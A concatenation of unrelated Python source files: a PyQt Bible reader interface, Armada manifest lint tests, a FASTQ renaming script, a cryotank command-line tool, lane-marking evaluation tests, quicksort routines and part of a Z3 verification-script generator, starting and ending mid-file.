        # self.set_items([c for c in 'abcdefghijklmnopqrstuvwxyz']) # for testing
        self.itemActivated.connect(self.on_book_selected)

    def on_book_selected(self, book_item):
        # book_item is a QtListItem; its text is the book name
        selected_book = book_item.text()
        if has_chapters(selected_book):
            # multi-chapter book: go to the chapter screen first
            self.nav.to(ChaptersPage, state=get_num_chapters(selected_book))
        else:
            # single-chapter book: skip straight to the verses screen
            self.nav.to(VersesPage, state=data.bible[selected_book])
        # widget cleanup
        self.nav.set_title(data.curr_scripture.inc(selected_book, inplace=True))
        self.searchbox.deactivate()
        self.show_all()  # reset any searches when naving back

    def keyPressEvent(self, event):
        if event.key() == Qt.Key_Escape:
            QApplication.exit(2)  # RESTART_EXIT_CODE
        if ctrl_f_event(event):
            # Ctrl+F from the book list searches the whole bible
            self.nav.to(SearchResultsPage, state=lambda: iter_verses_in_whole_bible())
            self.searchbox.deactivate()
        else:
            FilterableList.keyPressEvent(self, event)  # this is 0th page; don't need nav back
class ChaptersPage(Page, FilterableList):
    '''List of chapter numbers 1->n for given book and connects to next verses page.'''

    def __init__(self):
        Page.__init__(self)
        FilterableList.__init__(self)
        self.itemActivated.connect(self.on_chapter_selected)

    def load_state(self, state):
        # state is the chapter count of the selected book
        num_chapters = state
        self.set_items(range(1, num_chapters + 1))

    def on_chapter_selected(self, chapter_item):
        chosen_chapter = chapter_item.text()
        data.curr_scripture.inc(chosen_chapter, inplace=True)
        # show the chapter's verses
        chapter_verses = get_bible_content(data.curr_scripture)
        self.nav.to(VersesPage, state=chapter_verses)
        # widget cleanup
        self.nav.set_title(str(data.curr_scripture))
        self.searchbox.deactivate()
        self.show_all()  # reset any searches when naving back

    def keyPressEvent(self, event):
        if not self.search_is_active() and event.key() == Qt.Key_Backspace:
            self.nav.back()
            self.nav.set_title(data.curr_scripture.dec(inplace=True))
        elif ctrl_f_event(event):
            # Ctrl+F here searches the current book only
            self.nav.to(SearchResultsPage, state=lambda: iter_verses_in_book(data.curr_scripture))
            self.searchbox.deactivate()
        else:
            FilterableList.keyPressEvent(self, event)
class VersesPage(Page, QTextEdit, Filterable):
    '''Formats dict of verses {num: text} into text display.
    Filterable by verse num, isolating and highlighting text.'''

    def __init__(self):
        Page.__init__(self)
        QTextEdit.__init__(self)
        Filterable.__init__(self)
        # style
        self.setReadOnly(True)
        set_font_size(self, 11)

    def load_state(self, state):
        """Receive the chapter's verses and render them."""
        # state = dict of verses in chapter; keys appear to be verse-number
        # strings (filter_items indexes with str(n)) — TODO confirm at caller
        self.verses = state
        self.show_all()

    def show_all(self):
        """Render the whole chapter with no highlight."""
        # render
        html = format_to_html(self.verses)
        self.set_html(html)

    def set_html(self, html):
        """Set the widget HTML while preserving the current scroll position."""
        # wrapping textEdit.setHtml to keep scroll position
        scroll_pos = self.verticalScrollBar().value()
        self.setHtml(html)  # this resets scroll
        self.verticalScrollBar().setValue(scroll_pos)

    def filter_items(self, pattern):
        """Highlight the verse whose number matches *pattern* and scroll to it."""
        # highlight verse, given number
        # make sure the verse is there; otherwise fall back to the full view
        if pattern not in self.verses.keys():
            self.show_all()
            return
        n = int(pattern)
        verse = self.verses[str(n)]
        # divide text around verse: verses before, the match, verses after
        pre_verses = dict_where_keys(self.verses, lambda k: int(k) < n)
        main_verse = {n: verse}
        post_verses = dict_where_keys(self.verses, lambda k: int(k) > n)
        pre, main, post = (format_to_html(vs) for vs in (pre_verses, main_verse, post_verses))
        # dim the surrounding verses so the match stands out
        html = (
            OPACITY_TEMPLATE.format(pre) +
            f' {main} ' +
            OPACITY_TEMPLATE.format(post)
        )
        self.set_html(html)
        # find verse position in text widget (plain-text offset of the match)
        plain_verse = to_plaintext(main)
        plain_start = self.toPlainText().index(plain_verse)
        c = self.textCursor()
        c.setPosition(plain_start)
        self.setTextCursor(c)
        # scroll to verse position
        rect = self.cursorRect()
        top = rect.top()
        vbar = self.verticalScrollBar()
        vbar.setValue(vbar.value() + top)  # top of verse is top of screen
        if not vbar.value() == vbar.maximum():  # avoid edge case of last verse: it stays maximum scroll, else hiding last line
            vbar.triggerAction(QAbstractSlider.SliderSingleStepSub)  # but in general content looks nicer when not pinned to top

    def change_highlighted_scripture(self, diff):
        """Move the highlight one verse up (diff=-1) or down (diff=+1)."""
        pattern = self.searchbox.text()
        # allow new highlight from beginning or end
        if pattern == '':
            last_verse = list(self.verses.keys())[-1]
            # NOTE(review): relies on dict insertion order putting the last
            # verse last — confirm where self.verses is built
            n = (1 if diff == 1 else last_verse)
        # else make sure a verse is already selected
        elif pattern not in self.verses.keys():
            return
        # make sure new verse within bounds
        else:
            n = int(pattern) + diff
            if str(n) not in self.verses.keys():
                return
        # update searchbox, which triggers new highlight filter and updates user
        self.searchbox.activate(str(n))

    def keyPressEvent(self, event):
        """Route keys: back-nav, highlight stepping, chapter search, scrolling."""
        keypress = event.key()
        # nav back when backspacing without searchbox
        if not self.search_is_active() and keypress == Qt.Key_Backspace:
            self.nav.back()
            self.nav.set_title(data.curr_scripture.dec(inplace=True))
            self.verticalScrollBar().setValue(0)  # scroll back to top
        elif event.modifiers() == Qt.ControlModifier:
            # scripture up/down
            if keypress in (Qt.Key_Down, Qt.Key_Up):
                diff = (1 if keypress == Qt.Key_Down else -1)
                self.change_highlighted_scripture(diff)
            # search this chapter
            elif keypress == Qt.Key_F:
                self.nav.to(SearchResultsPage, state=lambda: scriptures_with_verses(data.curr_scripture, self.verses))
                self.searchbox.deactivate()
                self.verticalScrollBar().setValue(0)  # scroll back to top
        # scroll
        elif keypress in (Qt.Key_Down, Qt.Key_Up):
            QTextEdit.keyPressEvent(self, event)
        # keypress goes to searchbox
        else:
            Filterable.keyPressEvent(self, event)
class SearchResultDelegate(QStyledItemDelegate):
    # custom list item rendering,
    # mainly just to format a title and subtitle while looking like default list widget item

    def paint(self, painter, option, index):
        """Draw one search result: bold scripture title over an elided text line."""
        # turns item text into title and subtitle.
        # imitates standard list widget item style on select.
        # title bolded, subtitle beneath.
        # maybe custom eliding for ellipsis on both left and right, focused around match?
        # or at least on right, with match surely in view starting from left
        painter.save()
        item = index.data(Qt.DisplayRole)  # default item data is at role 0
        # custom data was passed into this item, no longer usual type str:
        # a dict with 'scripture' and 'text' keys (see SearchResultsPage.filter_items)
        title = str(item['scripture']) + '\n'
        subtitle = '\n' + item['text']
        given_rect = option.rect  # from size hint
        states = option.state  # bitwise OR of QStyle.State_ flags
        if states & QStyle.State_Selected:
            # mimic the default selected-item look: highlight bg, contrasting text
            palette = QApplication.palette()
            painter.setPen(palette.color(QPalette.HighlightedText))
            painter.fillRect(given_rect, palette.color(QPalette.Highlight))
        # text inset by small margin
        text_rect = given_rect.adjusted(2, 2, -2, -2)
        # draw title text
        em_font = QFont(option.font)  # copy
        em_font.setWeight(QFont.Bold)
        painter.setFont(em_font)
        painter.drawText(text_rect, option.displayAlignment, title)
        # draw subtitle text
        painter.setFont(option.font)  # back to default font
        # painter.translate(3, 0) # slight indent under title might look nice
        elided_subtitle = QFontMetrics(QFont(option.font)).elidedText(subtitle, Qt.ElideRight, text_rect.width())#, Qt.TextShowMnemonic)
        # elided_subtitle = painter.fontMetrics().elidedText(subtitle, Qt.ElideRight, text_rect.width())#, Qt.TextShowMnemonic)
        painter.drawText(text_rect, option.displayAlignment, elided_subtitle)
        painter.restore()

    def sizeHint(self, option, index):
        """Report a fixed two-line height and zero width (suppresses h-scroll)."""
        # fit to width, creating ellipsis on long text with no need for horiz scroll
        # default height seems to have been n*line_height of str in option.data(Qt.DisplayRole)
        s = QSize()
        font_metrics = QFontMetrics(option.font)
        line_height = font_metrics.height()
        extra = 4  # produces more comfortable line spacing; 'elbow room'
        s.setHeight(2*line_height + extra)  # 1 line for title, subtitle each
        s.setWidth(0)  # don't allow horiz scroll when there's wide items
        return s
class SearchResultsPage(Page, FilterableList):
    '''Searches given verses by regex from searchbox and shows matches in list.'''

    def __init__(self):
        self.default_placeholder_msg = 'search regex:'
        Page.__init__(self)
        FilterableList.__init__(self, placeholder=self.default_placeholder_msg)
        self.setItemDelegate(SearchResultDelegate(self))  # custom rendering of list item
        # self.itemActivated.connect(self.on_result_item_selected)
        # dummy searchbox serves as visual prompt on empty screen
        # gives better communication to user
        self.fake_searchbox = SearchBox(None)
        add_grid_child(self, self.fake_searchbox, Qt.AlignRight | Qt.AlignBottom, grid=self.layout())
        self.fake_searchbox.show()
        # to decrease stalling when doing a large search?
        # self._thread = None
        # batches aren't working/helping, maybe because it's a listwidget instead of listview
        # QListView.setLayoutMode(self, QListView.Batched)
        # self.setBatchSize(5)
        # self.setUniformItemSizes(True) # don't think it's helping
        # maybe implement a list view instead of a list widget?

    def load_state(self, state):
        """Receive a factory producing (scripture, verse_text) pairs to search."""
        # state = callable that produces iter of verses in desired scope
        self.verses_iter_factory = state
        scope = str(data.curr_scripture)
        self.nav.set_title('Search ' + scope)
        self.show_all()  # trigger empty search display

    def show_all(self):
        """Reset to the empty-search prompt."""
        # called when searchbox is empty, which means
        # show placeholder and extra searchbox prompt for user.
        self.clear()
        self.fake_searchbox.show()
        self.placeholder.setText(self.default_placeholder_msg)

    def show_items(self, items):
        """No-op: result rendering is handled entirely by filter_items."""
        # replaced by custom filter_items, so override and do nothing
        return

    # def on_result_item_selected(self, item):
    #     # callback for list widget selection
    #     d = item.data(Qt.DisplayRole)
    #     self.nav.to(SearchedVersePage, state=d['location'])

    def filter_items(self, search_text):
        """Run the regex over the scoped verses and list every matching verse."""
        # show matches of search in a list
        self.fake_searchbox.hide()  # could be showing if this is first char of search
        self.placeholder.setText(self.default_placeholder_msg)  # could be diff if last search was error
        # validate the regex before scanning; bad patterns show an error placeholder
        try:
            re.compile(search_text)
        except re.error:
            self.placeholder.setText('invalid regex')
            self.clear()
            return
        self.clear()
        # items = []
        for scripture, verse_text in self.verses_iter_factory():
            match = re.search(search_text, verse_text)
            if match is not None:
                # item data is a dict consumed by SearchResultDelegate.paint
                item = QListWidgetItem()#self)
                item.setData(Qt.DisplayRole, {
                    'scripture': scripture,
                    'text': verse_text.replace('\n', ' '),
                })
                # items.append(item)
                self.addItem(item)
        # for i in items:
        #     self.addItem(i)
        # print(self.item(100).data(0))
        # when finished iter and no matches
        if self.is_empty():
            self.placeholder.setText('no results')
        else:
            self.placeholder.setText('')

    def is_empty(self):
        """Return True when the result list holds no items."""
        # return QListWidget.count(self) == 0 # works if you used addItem
        return self.itemAt(0, 0) is None  # works with just making ListItem(self), not having called addItem

    def keyPressEvent(self, event):
        """Backspace on an empty search navigates back; all else filters."""
        empty_search = not self.search_is_active() or self.searchbox.text() == ''
        if empty_search and event.key() == Qt.Key_Backspace:
            self.nav.back()
            self.nav.set_title(str(data.curr_scripture))
            # self.clear()
        else:
            FilterableList.keyPressEvent(self, event)
class Main(QWidget):
    '''Outer window shown; wraps the child widget and restores the previous
    session's window geometry from settings.'''

    def __init__(self, child):
        super().__init__()
        grid = MarginGrid()
        grid.addWidget(child, 0, 0)
        self.setLayout(grid)
        child.setParent(self)
        # settings.ini lives alongside app resources (explicit location)
        self.settings = QSettings(str(RESOURCE_DIR / 'settings.ini'), QSettings.IniFormat)
        # self.settings = QSettings('FastBible', 'FastBible') # saved in some OS specific location
        fallback = bytes('', encoding='utf-8')
        saved_geometry = self.settings.value('geometry', fallback)
        self.restoreGeometry(saved_geometry)

    def closeEvent(self, event):
        # persist window geometry for the next launch
        self.settings.setValue('geometry', self.saveGeometry())
        super().closeEvent(event)
# --- run
if __name__ == '__main__':
    # Application entry point: build the app context, apply theming, load the
    # bible data, then show the page stack (books -> chapters -> verses -> search).
    appctxt = MyAppContext()
    set_theme(appctxt.app)
    init_data()
    main = Main(PageManager(BooksPage, ChaptersPage, VersesPage, SearchResultsPage))
    main.show()
    main.setWindowTitle('Bible')
    # exit_code = appctxt.app.exec_()
    # sys.exit(exit_code)
    appctxt.app.run()
| 14,682 | 4,325 |
# Copyright 2017 The Armada Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import yaml
import os
from armada.utils import lint
class LintTestCase(unittest.TestCase):
    """Tests for armada.utils.lint document validation helpers."""

    def setUp(self):
        # Directory containing this test file; used to locate fixture templates.
        self.basepath = os.path.join(os.path.dirname(__file__))

    def test_lint_armada_yaml_pass(self):
        """A known-good document file validates successfully."""
        template = '{}/templates/valid_armada_document.yaml'.format(
            self.basepath)
        # Bug fix: open(template).read() leaked the file handle; use a
        # context manager so the file is closed deterministically.
        with open(template) as f:
            document = yaml.safe_load_all(f.read())
        resp = lint.validate_armada_documents(document)
        self.assertTrue(resp)

    def test_lint_armada_manifest_no_groups(self):
        """A manifest without chart_groups is rejected."""
        template_manifest = """
        schema: armada/Manifest/v1
        metadata:
            schema: metadata/Document/v1
            name: example-manifest
        data:
            release_prefix: example
        """
        document = yaml.safe_load_all(template_manifest)
        with self.assertRaises(Exception):
            lint.validate_armada_documents(document)

    def test_lint_validate_manifest_pass(self):
        """A complete manifest document passes validation."""
        template_manifest = """
        schema: armada/Manifest/v1
        metadata:
            schema: metadata/Document/v1
            name: example-manifest
        data:
            release_prefix: example
            chart_groups:
                - example-group
        """
        document = yaml.safe_load_all(template_manifest)
        self.assertTrue(lint.validate_manifest_document(document))

    def test_lint_validate_manifest_no_prefix(self):
        """A manifest missing release_prefix is rejected."""
        template_manifest = """
        schema: armada/Manifest/v1
        metadata:
            schema: metadata/Document/v1
            name: example-manifest
        data:
            chart_groups:
                - example-group
        """
        document = yaml.safe_load_all(template_manifest)
        with self.assertRaises(Exception):
            lint.validate_manifest_document(document)

    def test_lint_validate_group_pass(self):
        """A complete chart group document passes validation."""
        template_manifest = """
        schema: armada/ChartGroup/v1
        metadata:
            schema: metadata/Document/v1
            name: example-manifest
        data:
            description: this is sample
            chart_group:
                - example-group
        """
        document = yaml.safe_load_all(template_manifest)
        self.assertTrue(lint.validate_chart_group_document(document))

    def test_lint_validate_group_no_chart_group(self):
        """A chart group missing chart_group is rejected."""
        template_manifest = """
        schema: armada/ChartGroup/v1
        metadata:
            schema: metadata/Document/v1
            name: example-manifest
        data:
            description: this is sample
        """
        document = yaml.safe_load_all(template_manifest)
        with self.assertRaises(Exception):
            lint.validate_chart_group_document(document)

    def test_lint_validate_chart_pass(self):
        """A complete chart document passes validation."""
        template_manifest = """
        schema: armada/Chart/v1
        metadata:
            schema: metadata/Document/v1
            name: example-chart
        data:
            name: keystone
            release: keystone
            namespace: undercloud
            timeout: 100
            install:
                no_hooks: false
            upgrade:
                no_hooks: false
            values: {}
            source:
                type: git
                location: git://github.com/example/example
                subpath: example-chart
                reference: master
            dependencies:
                - dep-chart
        """
        document = yaml.safe_load_all(template_manifest)
        self.assertTrue(lint.validate_chart_document(document))

    def test_lint_validate_chart_no_release(self):
        """A chart missing its release name is rejected."""
        template_manifest = """
        schema: armada/Chart/v1
        metadata:
            schema: metadata/Document/v1
            name: example-chart
        data:
            name: keystone
            namespace: undercloud
            timeout: 100
            install:
                no_hooks: false
            upgrade:
                no_hooks: false
            values: {}
            source:
                type: git
                location: git://github.com/example/example
                subpath: example-chart
                reference: master
            dependencies:
                - dep-chart
        """
        document = yaml.safe_load_all(template_manifest)
        with self.assertRaises(Exception):
            lint.validate_chart_document(document)

    def test_lint_validate_manifest_url(self):
        """Only well-formed URLs are accepted as manifest locations."""
        value = 'url'
        assert lint.validate_manifest_url(value) is False
        value = 'https://raw.githubusercontent.com/att-comdev/' \
                'armada/master/examples/simple.yaml'
        assert lint.validate_manifest_url(value) is True

    def test_lint_validate_manifest_filepath(self):
        """Only existing file paths are accepted as manifest locations."""
        value = 'filepath'
        assert lint.validate_manifest_filepath(value) is False
        value = '{}/templates/valid_armada_document.yaml'.format(
            self.basepath)
        assert lint.validate_manifest_filepath(value) is True
| 5,458 | 1,489 |
#! /usr/bin/env python
import csv
import sys
import os
import pathogenseq.files as psf
# Rename "<barcode>.fastq.gz" files to "<name>.<barcode>.fastq.gz" using the
# sample sheet (CSV with "Name" and "Barcode" columns) given as argv[1].
infile = sys.argv[1]
# Bug fix: the CSV file handle was opened without ever being closed;
# a context manager guarantees deterministic cleanup.
with open(infile) as csv_fh:
    for row in csv.DictReader(csv_fh):
        src = "%s.fastq.gz" % row["Barcode"]
        dest = "%s.%s.fastq.gz" % (row["Name"], row["Barcode"])
        psf.filecheck(src)  # presumably aborts/raises if src is missing — verify in pathogenseq
        os.rename(src, dest)
| 278 | 126 |
import sys
import json
import pprint
import argparse
import logging
import synapse.common as s_common
import synapse.cryotank as s_cryotank
import synapse.lib.cell as s_cell
import synapse.lib.output as s_output
import synapse.lib.msgpack as s_msgpack
logger = logging.getLogger(__name__)
def _except_wrap(it, error_str_func):
''' Wrap an iterator and adds a bit of context to the exception message '''
item_no = 0
while True:
item_no += 1
try:
yield next(it)
except StopIteration:
return
except Exception as e:
extra_context = error_str_func(item_no)
e.args = (extra_context + ': ' + str(e.args[0]), ) + e.args[1:]
raise
def main(argv, outp=s_output.stdout):
    '''CLI entry point for cryo.cat: list tanks, dump items from a remote
    cryo tank, or ingest items into one from stdin.

    argv: command-line arguments (without the program name)
    outp: output object used for printed results

    Returns 0 on success, 1 on argument/validation errors.
    '''
    pars = argparse.ArgumentParser(prog='cryo.cat', description='display data items from a cryo cell')
    pars.add_argument('cryocell', help='The cell descriptor and cryo tank path (cell://<host:port>/<name>).')
    pars.add_argument('--list', default=False, action='store_true', help='List tanks in the remote cell and return')
    pars.add_argument('--offset', default=0, type=int, help='Begin at offset index')
    pars.add_argument('--size', default=10, type=int, help='How many items to display')
    pars.add_argument('--timeout', default=10, type=int, help='The network timeout setting')
    pars.add_argument('--authfile', help='Path to your auth file for the remote cell')
    # jsonl and msgpack are mutually exclusive I/O formats
    group = pars.add_mutually_exclusive_group()
    group.add_argument('--jsonl', action='store_true', help='Input/Output items in jsonl format')
    group.add_argument('--msgpack', action='store_true', help='Input/Output items in msgpack format')
    pars.add_argument('--verbose', '-v', default=False, action='store_true', help='Verbose output')
    pars.add_argument('--ingest', '-i', default=False, action='store_true',
                      help='Reverses direction: feeds cryotank from stdin in msgpack or jsonl format')
    pars.add_argument('--omit-offset', default=False, action='store_true',
                      help="Don't output offsets of objects. This is recommended to be used when jsonl/msgpack"
                           " output is used.")
    opts = pars.parse_args(argv)

    if opts.verbose:
        logger.setLevel(logging.INFO)

    # --authfile is mandatory for now; ingest additionally requires a format
    if not opts.authfile:
        logger.error('Currently requires --authfile until neuron protocol is supported')
        return 1
    if opts.ingest and not opts.jsonl and not opts.msgpack:
        logger.error('Must specify exactly one of --jsonl or --msgpack if --ingest is specified')
        return 1

    authpath = s_common.genpath(opts.authfile)
    auth = s_msgpack.loadfile(authpath)

    # parse "cell://host:port/name" into an address tuple and tank path
    netw, path = opts.cryocell[7:].split('/', 1)
    host, portstr = netw.split(':')
    addr = (host, int(portstr))
    logger.info('connecting to: %r', addr)

    cuser = s_cell.CellUser(auth)
    with cuser.open(addr, timeout=opts.timeout) as sess:
        cryo = s_cryotank.CryoClient(sess)

        if opts.list:
            # just enumerate the available tanks and exit
            for name, info in cryo.list(timeout=opts.timeout):
                outp.printf('%s: %r' % (name, info))
            return 0

        if opts.ingest:
            # read items from stdin (msgpack or jsonl) and push them to the tank,
            # wrapping the parse iterator so errors report the failing item number
            if opts.msgpack:
                fd = sys.stdin.buffer
                item_it = _except_wrap(s_msgpack.iterfd(fd), lambda x: 'Error parsing item %d' % x)
            else:
                fd = sys.stdin
                item_it = _except_wrap((json.loads(s) for s in fd), lambda x: ('Failure parsing line %d of input' % x))
            cryo.puts(path, item_it)
        else:
            # dump a slice of the tank in the requested output format
            for item in cryo.slice(path, opts.offset, opts.size, opts.timeout):
                i = item[1] if opts.omit_offset else item
                if opts.jsonl:
                    outp.printf(json.dumps(i, sort_keys=True))
                elif opts.msgpack:
                    sys.stdout.write(s_msgpack.en(i))
                else:
                    outp.printf(pprint.pformat(i))

    return 0
if __name__ == '__main__':  # pragma: no cover
    # Configure default logging and exit with main()'s return code.
    logging.basicConfig()
    sys.exit(main(sys.argv[1:]))
| 4,100 | 1,303 |
"""Test cases for lane.py."""
import os
import unittest
import numpy as np
from ..common.utils import list_files
from .lane import (
eval_lane_per_threshold,
evaluate_lane_marking,
get_foreground,
get_lane_class,
sub_task_funcs,
)
class TestGetLaneClass(unittest.TestCase):
    """Test cases for the lane specific channel extraction."""

    def test_partialled_classes(self) -> None:
        """Check the function that partial get_lane_class."""
        for value in range(255):
            byte = np.array(value, dtype=np.uint8)
            # bit 3 selects the lane class channel
            expected_lane = 1 if value & 8 else 0
            self.assertTrue(get_lane_class(byte, expected_lane, 3, 1))
            self.assertTrue(get_foreground(byte))
            # bit 5 encodes direction, bit 4 encodes style
            expected_direction = 1 if value & (1 << 5) else 0
            self.assertTrue(sub_task_funcs["direction"](byte, expected_direction))
            expected_style = 1 if value & (1 << 4) else 0
            self.assertTrue(sub_task_funcs["style"](byte, expected_style))
class TestEvalLanePerThreshold(unittest.TestCase):
    """Test cases for the per image per threshold lane marking evaluation."""

    def test_two_parallel_lines(self) -> None:
        """Scores flip from 0 to 1 once the radius spans the 4-pixel gap."""
        first = np.zeros((10, 10), dtype=bool)
        second = np.zeros((10, 10), dtype=bool)
        first[3, 3:7] = True
        second[7, 3:7] = True
        for radius in (1, 2, 3):
            self.assertAlmostEqual(eval_lane_per_threshold(first, second, radius), 0.0)
        for radius in (4, 5, 6):
            self.assertAlmostEqual(eval_lane_per_threshold(first, second, radius), 1.0)

    def test_two_vertical_lines(self) -> None:
        """Partial overlap grows with the radius for offset perpendicular lines."""
        first = np.zeros((10, 10), dtype=bool)
        second = np.zeros((10, 10), dtype=bool)
        first[3, 3:6] = True
        second[5:8, 7] = True
        self.assertAlmostEqual(eval_lane_per_threshold(first, second, 2), 0.0)
        self.assertAlmostEqual(eval_lane_per_threshold(first, second, 3), 1 / 3)
        self.assertAlmostEqual(eval_lane_per_threshold(first, second, 4), 2 / 3)
        self.assertAlmostEqual(eval_lane_per_threshold(first, second, 5), 1.0)
class TestEvaluateLaneMarking(unittest.TestCase):
    """Test cases for the evaluate_lane_marking function."""

    def test_mock_cases(self) -> None:
        """Check the performance scores on the bundled mock data."""
        cur_dir = os.path.dirname(os.path.abspath(__file__))
        gt_dir = "{}/testcases/lane/gts".format(cur_dir)
        res_dir = "{}/testcases/lane/res".format(cur_dir)
        result = evaluate_lane_marking(
            list_files(gt_dir, ".png", with_prefix=True),
            list_files(res_dir, ".png", with_prefix=True),
            nproc=1,
        )
        data_frame = result.pd_frame()
        # Fix: data_frame.to_numpy() was previously computed twice; convert once.
        data_arr = data_frame.to_numpy()
        # Expected score matrix for the mock ground truth/result pair.
        gt_data_arr = np.array(
            [
                [70.53328267, 80.9831119, 100.0],
                [100.0, 100.0, 100.0],
                [70.53328267, 80.9831119, 100.0],
                [100.0, 100.0, 100.0],
                [99.82147748, 100.0, 100.0],
                [100.0, 100.0, 100.0],
                [100.0, 100.0, 100.0],
                [75.33066961, 79.34917317, 100.0],
                [71.02916505, 86.25984707, 100.0],
                [100.0, 100.0, 100.0],
                [96.43828133, 100.0, 100.0],
                [94.79621737, 100.0, 100.0],
                [85.26664133, 90.49155595, 100.0],
                [85.26664133, 90.49155595, 100.0],
                [92.17697636, 95.70112753, 100.0],
                [87.57008634, 92.22807981, 100.0],
            ]
        )
        self.assertTrue(np.isclose(data_arr, gt_data_arr).all())
if __name__ == "__main__":
    # Allow running this test module directly with the unittest runner.
    unittest.main()
| 3,905 | 1,591 |
import random
def partition(array, low, high):
    """Hoare partition of array[low..high] around the middle element.

    Rearranges the range in place and returns an index r such that every
    element of array[low..r] is <= every element of array[r+1..high].
    """
    pivot = array[(low + high) // 2]
    i, j = low - 1, high + 1
    while True:
        # advance i past elements already on the correct (left) side
        i += 1
        while array[i] < pivot:
            i += 1
        # retreat j past elements already on the correct (right) side
        j -= 1
        while array[j] > pivot:
            j -= 1
        if i >= j:
            return j
        array[i], array[j] = array[j], array[i]


def quicksort(array, low, high):
    """Sort array[low..high] in place using the middle-element pivot."""
    if low >= high:
        return
    split = partition(array, low, high)
    quicksort(array=array, low=low, high=split)
    quicksort(array=array, low=split + 1, high=high)
def randomized_partition(array, low, high):
    """Hoare partition of array[low..high] around a random pivot element.

    Bug fix: the random element is first swapped to array[low] and used as
    the pivot from there (the CLRS form of Hoare's scheme).  Previously the
    pivot *value* was taken from an arbitrary random index; when that index
    was `high` and held the range maximum, the partition could return `high`
    itself, making the caller recurse on an unchanged range.

    Returns an index r such that every element of array[low..r] is <= every
    element of array[r+1..high].
    """
    pivot_index = random.randint(low, high)
    array[low], array[pivot_index] = array[pivot_index], array[low]
    pivot = array[low]
    left = low - 1
    right = high + 1
    while True:
        left += 1
        while array[left] < pivot:
            left += 1
        right -= 1
        while array[right] > pivot:
            right -= 1
        if left >= right:
            return right
        array[left], array[right] = array[right], array[left]


def randomized_quicksort(array, low, high):
    """Sort array[low..high] in place using random pivots throughout.

    Bug fix: the recursive calls previously invoked the deterministic
    `quicksort`, so randomization only applied to the top-level partition.
    """
    if low < high:
        split = randomized_partition(array, low, high)
        randomized_quicksort(array, low, split)
        randomized_quicksort(array, split + 1, high)
    return
def qsort(array, mode='normal'):
    """Sort *array* in place and return it.

    mode 'normal' uses the deterministic middle pivot, 'randomized' uses a
    random pivot; any other mode returns the array untouched.
    """
    last = len(array) - 1
    if mode == 'normal':
        quicksort(array, 0, last)
    elif mode == 'randomized':
        randomized_quicksort(array, 0, last)
    return array
| 1,561 | 494 |
import logging
from stencil_ir import *
from verify import *
from assertion_to_z3 import *
import generate_sketch
import asp.codegen.ast_tools as ast_tools
def loop_key(node):
    """Return a short, stable identifier for a loop node.

    The key is the first 10 hex characters of the SHA-224 digest of the
    loop's printed AST. The string is encoded explicitly so the hash works
    on Python 3 as well (hashlib requires bytes there); on Python 2 the
    encode is a no-op for ASCII output.
    """
    import hashlib
    return hashlib.sha224(tree_to_str(node).encode('utf-8')).hexdigest()[0:10]
class Z3Generator(object):
    """
    Generates a Z3 script, with the parsed postcondition from the
    output of Sketch. The output of this class is a script ready to
    send to Z3 for verification.
    """
    # NOTE(review): this class relies on Python 2 semantics -- `map` and
    # `filter` results are concatenated with lists and iterated more than
    # once. Porting to Python 3 requires wrapping those in list(...).
    def __init__(self, program, inputs, loopvars, invariant):
        """
        program is the AST of the loop nest to process.
        inputs is a dict mapping names to (Sketch) types (most importantly for arrays).
        invariant is a dict mapping generated function names from sketch to strings that can be parsed by parse_ir
        """
        # NOTE(review): despite the docstring, `inputs` is consumed as a
        # sequence of (name, type) pairs throughout (see get_params) --
        # confirm against callers.
        self.program = program
        self.inputs = inputs
        self.loopvars = loopvars
        # Z3 expressions (as strings) for each loop variable's bounds.
        self.loopvar_mins = {}
        self.loopvar_maxs = {}
        self.set_maxs_and_mins()
        logging.debug("Preprocessing, invariat is %s", invariant)
        self.synthesized_invariant = self.process_invariants(invariant)
        logging.debug("Synthesized invariant: %s", self.synthesized_invariant)
        self.out_array = generate_sketch.OutputArrayFinder().get_output_arrays(program)
        # Cache for get_containing_loop_invs(), filled lazily on first use.
        self.containing_loop_invs = {}
    def process_invariants(self, invariant):
        """
        Take strings in the invariant dict and convert into Z3 syntax.
        """
        from backend_halide import ToHalide
        import parse_ir
        ret = {}
        for inv_key in invariant.keys():
            ir = parse_ir.parse_expression(invariant[inv_key])
            logging.debug("loopvars are %s", self.loopvars)
            if "gen" in inv_key:
                converted_invariant = ToZ3(ir,self.loopvars,None,False,invariant,self.inputs).to_str()
                ret[inv_key] = converted_invariant
            else:
                ret[inv_key] = tree_to_str(ir)
        # Bug fix: the %s placeholder was missing, so `ret` was never
        # interpolated (logging emitted a formatting error instead).
        logging.debug("Processed invariants: %s", ret)
        return ret
    def generate(self):
        """
        Top-level. Generates an entire Z3 script for the given program and inputs.
        """
        # first, we generate the invariant & postcondition call
        postcondition = CallExp(VarNode("postcondition"),
                                [VarNode(x) for x in self.get_params_without_types()]
                                + map(lambda x: VarNode(x), self.get_loopvars())
                                + map(lambda x: VarNode(x+"_p"), self.get_loopvars()))
        new_invariant_signatures = self.generate_invariant_func_signatures()
        for x in new_invariant_signatures.keys():
            logging.debug("inv: %s", tree_to_str(new_invariant_signatures[x]))
        # get verification conditions
        logging.debug("invariant signatures: %s", [tree_to_str(new_invariant_signatures[x]) for x in new_invariant_signatures.keys()])
        wpc = WeakestPrecondition(self.program, postcondition, [], invariant_call=new_invariant_signatures)
        conds = wpc.get()
        additional_conds = wpc.additional_conditions
        from generate_sketch import RHSInvariantReplacer
        conds = RHSInvariantReplacer(self.get_loopvars()).visit(conds)
        additional_conds = map(RHSInvariantReplacer(self.get_loopvars()).visit, additional_conds)
        # translate verification conditions to Z3
        logging.debug("Translating the following VCs: %s %s", tree_to_str(conds), '\n\n'.join([tree_to_str(x) for x in additional_conds]))
        vc = ToZ3(conds, self.get_loopvars(), additional_conds, True, self.synthesized_invariant, self.inputs).to_str()
        # put it all together
        ret = self.generate_invariant_funcs()
        ret += self.generate_postcon_func()
        ret += self.generate_constants() + "\n\n"
        ret += self.generate_assumptions()
        ret += self.generate_signature() + vc + "))\n\n"
        ret += "(assert (not main))\n(check-sat)\n(get-model)\n"
        return ret
    def generate_invariant_func_signatures(self):
        """
        Generates signatures for each invariant function into a dict keyed by a hash of the loop
        body.
        """
        class InvGenLoopVisitor(asp.codegen.ast_tools.NodeVisitor):
